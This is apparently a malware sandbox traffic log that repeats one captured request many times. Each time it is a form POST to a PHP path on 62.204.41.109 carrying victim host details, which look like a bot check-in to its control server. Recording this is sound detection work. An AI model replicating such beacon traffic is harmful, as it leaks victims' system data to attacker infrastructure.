                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
